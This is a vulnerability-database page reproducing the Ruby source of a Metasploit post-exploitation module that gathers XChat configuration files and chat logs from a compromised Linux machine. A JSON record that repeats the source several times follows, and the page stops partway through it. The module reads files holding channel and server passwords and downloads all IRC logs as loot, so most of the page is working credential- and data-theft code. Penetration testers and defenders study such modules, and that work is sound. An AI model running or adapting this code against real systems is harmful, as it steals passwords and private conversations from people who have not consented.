Search...

Linux Gather XChat Enumeration

2012-03-31T05:15:21

ID MSF:POST/LINUX/GATHER/ENUM_XCHAT
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Post
  include Msf::Post::File

  def initialize(info={})
    super( update_info( info,
      'Name'          =&gt; 'Linux Gather XChat Enumeration',
      'Description'   =&gt; %q{
          This module will collect XChat's config files and chat logs from the victim's
        machine.  There are three actions you may choose: CONFIGS, CHATS, and ALL.  The
        CONFIGS option can be used to collect information such as channel settings,
        channel/server passwords, etc.  The CHATS option will simply download all the
        .log files.
      },
      'License'       =&gt; MSF_LICENSE,
      'Author'        =&gt; ['sinn3r'],
      'Platform'      =&gt; ['linux'],
      # linux meterpreter is too busted to support right now,
      # will come back and add support once it's more usable.
      'SessionTypes'  =&gt; ['shell', 'meterpreter'],
      'Actions'       =&gt;
        [
          ['CONFIGS', { 'Description' =&gt; 'Collect XCHAT\'s config files' } ],
          ['CHATS',   { 'Description' =&gt; 'Collect chat logs with a pattern' } ],
          ['ALL',     { 'Description' =&gt; 'Collect both the plists and chat logs'}]
        ],
      'DefaultAction' =&gt; 'ALL'
    ))
  end

  def get_file(file)
    tries = 0
    print_status("#{@peer} - Downloading #{file}")

    begin
      buf = read_file(file)
      buf = '' if buf =~ /No such file or directory/
    rescue ::Timeout::Error =&gt; e
      tries += 1
      if tries &lt; 3
        vprint_error("#{@peer} - #{e.message} - retrying...")
        retry
      end
      buf = ''
    rescue EOFError =&gt; e
      tries += 1
      if tries &lt; 3
        vprint_error("#{@peer} - #{e.message} - retrying...")
        retry
      end
      buf = ''
    end

    return buf
  end

  def whoami
    user = cmd_exec("/usr/bin/whoami").chomp
    return user
  end

  def list_logs(base)
    list = cmd_exec("ls -l #{base}*.log")

    return [] if list =~ /No such file or directory/
    files = list.scan(/\d+\x20\w{3}\x20\d+\x20\d{2}\:\d{2}\x20(.+)$/).flatten

    return files
  end

  def save(type, data)
    case type
    when :configs
      type = 'xchat.config'
    when :chatlogs
      type = 'xchat.chatlogs'
    end

    data.each do |d|
      fname = ::File.basename(d[:filename])
      p = store_loot(
        type,
        'text/plain',
        session,
        d[:data],
        fname
      )

      print_good("#{@peer} - #{fname} saved as #{p}")
    end
  end

  def get_chatlogs(base)
    base &lt;&lt; "xchatlogs/"

    logs = []

    list_logs(base).each do |l|
      vprint_status("#{@peer} - Downloading: #{l}")
      data = read_file(l)
      logs &lt;&lt; {
        :filename =&gt; l,
        :data     =&gt; data
      }
    end

    return logs
  end

  def get_configs(base)
    config = []
    files  = ['servlist_.conf', 'xchat.conf']
    files.each do |f|
      vprint_status("#{@peer} - Downloading: #{base + f}")
      buf = read_file(base + f)
      next if buf.blank?
      config &lt;&lt; {
        :filename =&gt; f,
        :data     =&gt; buf
      }
    end

    return config
  end

  def run
    if action.nil?
      print_error("Please specify an action")
      return
    end

    @peer = "#{session.session_host}:#{session.session_port}"

    user = whoami
    if user.blank?
      print_error("#{@peer} - Unable to get username, abort.")
      return
    end

    base = "/home/#{user}/.xchat2/"

    configs  = get_configs(base)  if action.name =~ /ALL|CONFIGS/i
    chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i

    save(:configs, configs)   unless configs.empty?
    save(:chatlogs, chatlogs) unless chatlogs.empty?
  end
end

=begin
Linux xchat path:
/home/[username]/.xchat2/
  * /home/[username]/.xchat2/servlist_.conf
  * /home/[username]/.xchat2/xchat.conf
  * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log
=end

JSON Vulners Source

Initial Source

{"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "hash": "d2eafdba797c7c20dfacc0c58a9613f7", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-22T15:34:20", "history": [{"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-05-03T20:42:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/post/linux/gather/enum_xchat", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-02T23:41:21", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\n\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2017-07-02T23:41:21", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.rapid7.com/db/modules/post/linux/gather/enum_xchat", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-07-24T19:31:25", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2017-07-24T19:31:25", "differentElements": ["href"], "edition": 2}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-08-21T15:32:39", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2017-08-21T15:32:39", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-21T07:42:40", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2017-10-21T07:42:40", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "2012-03-31T05:15:21", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-10-22T03:44:44", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2017-10-22T03:44:44", "value": 3.6}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n type = 'xchat.chatlogs'\n end\n\n data.each do |d|\n fname = ::File.basename(d[:filename])\n p = store_loot(\n type,\n 'text/plain',\n session,\n d[:data],\n fname\n )\n\n print_good(\"#{@peer} - #{fname} saved as #{p}\")\n end\n end\n\n def get_chatlogs(base)\n base << \"xchatlogs/\"\n\n logs = []\n\n list_logs(base).each do |l|\n vprint_status(\"#{@peer} - Downloading: #{l}\")\n data = read_file(l)\n logs << {\n :filename => l,\n :data => data\n }\n end\n\n return logs\n end\n\n def get_configs(base)\n config = []\n files = ['servlist_.conf', 'xchat.conf']\n files.each do |f|\n vprint_status(\"#{@peer} - Downloading: #{base + f}\")\n buf = read_file(base + f)\n next if buf.blank?\n config << {\n :filename => f,\n :data => buf\n }\n end\n\n return config\n end\n\n def run\n if action.nil?\n print_error(\"Please specify an action\")\n return\n end\n\n @peer = \"#{session.session_host}:#{session.session_port}\"\n\n user = whoami\n if user.blank?\n print_error(\"#{@peer} - Unable to get username, abort.\")\n return\n end\n\n base = \"/home/#{user}/.xchat2/\"\n\n configs = get_configs(base) if action.name =~ /ALL|CONFIGS/i\n chatlogs = get_chatlogs(base) if action.name =~ /ALL|CHATS/i\n\n save(:configs, configs) unless configs.empty?\n save(:chatlogs, chatlogs) unless chatlogs.empty?\n end\nend\n\n=begin\nLinux xchat path:\n/home/[username]/.xchat2/\n * /home/[username]/.xchat2/servlist_.conf\n * /home/[username]/.xchat2/xchat.conf\n * /home/[username]/.xchat2/xchatlogs/FreeNode-#aha.log\n=end\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/linux/gather/enum_xchat.rb"}, "lastseen": "2017-10-22T03:44:44", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:POST/LINUX/GATHER/ENUM_XCHAT", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Gather XChat Enumeration", "description": "This module will collect XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will simply download all the .log files.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2017-12-31T06:01:29", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2017-12-31T06:01:29", "value": 3.6}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/linux/gather/enum_xchat.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Linux Gather XChat Enumeration',\n 'Description' => %q{\n This module will collect XChat's config files and chat logs from the victim's\n machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The\n CONFIGS option can be used to collect information such as channel settings,\n channel/server passwords, etc. The CHATS option will simply download all the\n .log files.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['sinn3r'],\n 'Platform' => ['linux'],\n # linux meterpreter is too busted to support right now,\n # will come back and add support once it's more usable.\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Actions' =>\n [\n ['CONFIGS', { 'Description' => 'Collect XCHAT\\'s config files' } ],\n ['CHATS', { 'Description' => 'Collect chat logs with a pattern' } ],\n ['ALL', { 'Description' => 'Collect both the plists and chat logs'}]\n ],\n 'DefaultAction' => 'ALL'\n ))\n end\n\n def get_file(file)\n tries = 0\n print_status(\"#{@peer} - Downloading #{file}\")\n\n begin\n buf = read_file(file)\n buf = '' if buf =~ /No such file or directory/\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n buf = ''\n end\n\n return buf\n end\n\n def whoami\n user = cmd_exec(\"/usr/bin/whoami\").chomp\n return user\n end\n\n def list_logs(base)\n list = cmd_exec(\"ls -l #{base}*.log\")\n\n return [] if list =~ /No such file or directory/\n files = list.scan(/\\d+\\x20\\w{3}\\x20\\d+\\x20\\d{2}\\:\\d{2}\\x20(.+)$/).flatten\n\n return files\n end\n\n def save(type, data)\n case type\n when :configs\n type = 'xchat.config'\n when :chatlogs\n 